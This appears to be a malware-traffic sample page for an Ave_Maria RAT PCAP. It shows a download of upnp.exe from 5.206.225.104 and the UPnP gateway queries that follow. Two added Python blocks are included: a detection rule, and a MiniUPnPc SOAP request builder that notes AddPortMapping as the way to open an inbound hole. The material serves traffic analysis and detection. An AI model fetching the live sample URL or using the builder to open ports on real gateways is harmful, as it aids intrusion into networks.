Ave_Maria Malware RAT APT PCAP Download Traffic Sample upnp.exe 5.206.225.104

Download Attachments

  • 1 pcap upnp
    Date added: May 22, 2019 5:03 am
    Added by: admin
    File size: 169 KB
    Downloads: 73

2019-05-21 22:21:56.293446 IP 10.1.10.162.53185 > 5.206.225.104.80: Flags [P.], seq 1:428, ack 1, win 16425, length 427: HTTP: GET /dll/upnp.exe HTTP/1.1
GET /dll/upnp.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 5.206.225.104
Connection: Keep-Alive
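The GET above is a browser-looking fetch of an executable from a bare IP address; the rest of this capture shows the same client, fifteen seconds later, talking UPnP IGD to its gateway with the MiniUPnPc library. Detection logic for that sequence, as an added example that is not code from the page or from the sample's author: it parses tcpdump-style request text into per-request records, flags an executable download whose Host header is an IP literal, and correlates it with IGD control traffic (MiniUPnPc User-Agent or a WANIPConnection/WANPPPConnection SOAPAction) from the same client inside a time window. The input is a constructed reduction of the requests in this capture (summary line, request line, and the headers the rules read); the 60-second window and the list of executable suffixes are assumptions.

```python
import re
from datetime import datetime

# Constructed sample: the client requests from the capture above, reduced to the
# tcpdump summary line, the HTTP request line and the headers the rules look at.
SAMPLE = """\
2019-05-21 22:21:56.293446 IP 10.1.10.162.53185 > 5.206.225.104.80: Flags [P.], seq 1:428, ack 1, win 16425, length 427: HTTP: GET /dll/upnp.exe HTTP/1.1
GET /dll/upnp.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.206.225.104

2019-05-21 22:22:11.202603 IP 10.1.10.162.53186 > 10.1.10.1.49153: Flags [P.], seq 1:142, ack 1, win 16425, length 141
GET /IGDdevicedesc_brlan0.xml HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1

2019-05-21 22:22:11.213261 IP 10.1.10.162.53187 > 10.1.10.1.49153: Flags [P.], seq 1:583, ack 1, win 16425, length 582
POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetStatusInfo"

2019-05-21 22:22:11.232070 IP 10.1.10.162.53188 > 10.1.10.1.49153: Flags [P.], seq 1:604, ack 1, win 16425, length 603
POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
"""

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
    r"(?P<src>\d+\.\d+\.\d+\.\d+)\.\d+ > (?P<dst>\d+\.\d+\.\d+\.\d+)\.\d+:")
BARE_IPV4_HOST_RE = re.compile(r"^\d+\.\d+\.\d+\.\d+(:\d+)?$")
EXEC_SUFFIXES = (".exe", ".dll", ".scr")  # assumption: what counts as an executable fetch


def parse_requests(text):
    """Turn blank-line separated tcpdump request dumps into dicts."""
    requests = []
    for block in text.strip().split("\n\n"):
        lines = block.splitlines()
        m = SUMMARY_RE.match(lines[0])
        parts = lines[1].split(" ", 2) if len(lines) > 1 else []
        if not m or len(parts) != 3:
            continue  # not a client request we can interpret
        headers = {}
        for line in lines[2:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        requests.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
            "src": m["src"], "dst": m["dst"],
            "method": parts[0], "path": parts[1], "headers": headers,
        })
    return requests


def is_exe_download_from_raw_ip(req):
    """Browser-looking GET of an executable where Host is an IP literal, not a name."""
    h = req["headers"]
    return (req["method"] == "GET"
            and req["path"].lower().endswith(EXEC_SUFFIXES)
            and BARE_IPV4_HOST_RE.match(h.get("host", "")) is not None
            and h.get("user-agent", "").startswith("Mozilla/"))


def is_upnp_igd_control(req):
    """UPnP IGD client activity: MiniUPnPc User-Agent or a WAN*Connection SOAP action."""
    h = req["headers"]
    return ("MiniUPnPc" in h.get("user-agent", "")
            or "WANIPConnection" in h.get("soapaction", "")
            or "WANPPPConnection" in h.get("soapaction", ""))


def detect(text, window_s=60.0):
    """Per client: an executable download followed within window_s by IGD control traffic."""
    findings = []
    requests = parse_requests(text)
    for dl in filter(is_exe_download_from_raw_ip, requests):
        later = [r for r in requests
                 if r["src"] == dl["src"] and is_upnp_igd_control(r)
                 and 0 <= (r["ts"] - dl["ts"]).total_seconds() <= window_s]
        if not later:
            continue
        actions = {r["headers"]["soapaction"].strip('"').rsplit("#", 1)[-1]
                   for r in later if "soapaction" in r["headers"]}
        findings.append({
            "client": dl["src"],
            "download": f"http://{dl['headers']['host']}{dl['path']}",
            "gateway": later[0]["dst"],
            "seconds_to_upnp": round((later[0]["ts"] - dl["ts"]).total_seconds(), 3),
            "soap_actions": sorted(actions),
        })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

On this capture the rule yields one finding: client 10.1.10.162 fetched http://5.206.225.104/dll/upnp.exe and, 14.9 seconds later, queried gateway 10.1.10.1 for GetStatusInfo and GetExternalIPAddress. The correlation is what keeps the false-positive rate down: an IGD query on its own is normal for games and media software, and an .exe fetch from a raw IP on its own is noisy; the two from the same host within a minute is the pattern worth an alert.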

2019-05-21 22:21:56.392855 IP 5.206.225.104.80 > 10.1.10.162.53185: Flags [.], ack 428, win 237, length 0

2019-05-21 22:22:11.202603 IP 10.1.10.162.53186 > 10.1.10.1.49153: Flags [P.], seq 1:142, ack 1, win 16425, length 141
GET /IGDdevicedesc_brlan0.xml HTTP/1.1
Host: 10.1.10.1:49153
Connection: Close
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1

2019-05-21 22:22:11.213261 IP 10.1.10.162.53187 > 10.1.10.1.49153: Flags [P.], seq 1:583, ack 1, win 16425, length 582
POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
Content-Length: 271
Content-Type: text/xml
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetStatusInfo"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

2019-05-21 22:22:11.232070 IP 10.1.10.162.53188 > 10.1.10.1.49153: Flags [P.], seq 1:604, ack 1, win 16425, length 603
POST /upnp/control/WANIPConnection0 HTTP/1.1
Host: 10.1.10.1:49153
User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1
Content-Length: 285
Content-Type: text/xml
SOAPAction: "urn:schemas-upnp-org:service:WANIPConnection:1#GetExternalIPAddress"
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
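The two POSTs to /upnp/control/WANIPConnection0 carry SOAP bodies the listing above does not show; only their Content-Length (271 and 285) and the tcpdump payload lengths (582 and 603) are visible. The following added example, which is not code from the page or from MiniUPnPc, rebuilds the request the way MiniUPnPc 2.1 (the client named in the User-Agent) formats an argument-less action: a fixed SOAP envelope around `<u:Action xmlns:u="service">`. That envelope layout is taken from the MiniUPnPc source and is an assumption as far as this page goes, so the block checks it against the numbers the capture does show; host, control URL, header set and header order are copied from the capture.

```python
# Added example (not code from the page or from MiniUPnPc): rebuild the SOAP
# requests behind the two POSTs above and check them against the capture's sizes.
WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
CONTROL_URL = "/upnp/control/WANIPConnection0"   # control URL seen in the capture
GATEWAY = "10.1.10.1:49153"                      # Host header seen in the capture

# Envelope layout MiniUPnPc emits for its SOAP calls. Assumption: taken from the
# library's source, not from this page, which omits the request bodies.
SOAP_PREFIX = ('<?xml version="1.0"?>\r\n'
               '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
               's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
               '<s:Body>')
SOAP_SUFFIX = '</s:Body></s:Envelope>\r\n'


def soap_body(service, action, args=()):
    """<u:Action xmlns:u="service"><Arg>value</Arg>...</u:Action> inside the envelope."""
    inner = "".join(f"<{name}>{value}</{name}>" for name, value in args)
    return (f'{SOAP_PREFIX}<u:{action} xmlns:u="{service}">{inner}'
            f'</u:{action}>{SOAP_SUFFIX}')


def soap_request(host, control_url, service, action, args=()):
    """Complete HTTP request, headers in the order the capture shows them."""
    body = soap_body(service, action, args).encode()
    head = (f"POST {control_url} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "User-Agent: MSWindows/6.1.7601, UPnP/1.1, MiniUPnPc/2.1\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Content-Type: text/xml\r\n"
            f'SOAPAction: "{service}#{action}"\r\n'
            "Connection: Close\r\n"
            "Cache-Control: no-cache\r\n"
            "Pragma: no-cache\r\n"
            "\r\n")
    return head.encode() + body


def parse_soapaction(value):
    """SOAPAction header value -> (service URN, action name)."""
    service, _, action = value.strip().strip('"').partition("#")
    return service, action


def check_against_capture(action, content_length, tcp_payload_length):
    """True when the rebuilt request matches the capture's Content-Length and tcpdump 'length'."""
    req = soap_request(GATEWAY, CONTROL_URL, WANIP, action)
    _, _, body = req.partition(b"\r\n\r\n")
    return len(body) == content_length and len(req) == tcp_payload_length


if __name__ == "__main__":
    # Values the capture shows: Content-Length 271 / 285, tcpdump length 582 / 603.
    for action, clen, plen in (("GetStatusInfo", 271, 582),
                               ("GetExternalIPAddress", 285, 603)):
        print(action, "matches capture:", check_against_capture(action, clen, plen))
    print(soap_request(GATEWAY, CONTROL_URL, WANIP, "GetExternalIPAddress").decode())
```

Both checks pass: the body lengths come out at exactly 271 and 285 bytes and the full requests at 582 and 603, so the two POSTs are consistent with argument-less GetStatusInfo and GetExternalIPAddress calls byte for byte as MiniUPnPc emits them. The `args` parameter covers actions that take arguments; none appear in this capture, but in a fuller one an AddPortMapping on the same control URL is the request to look for after GetExternalIPAddress, since that is what turns an external-address query into an inbound hole through the gateway.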
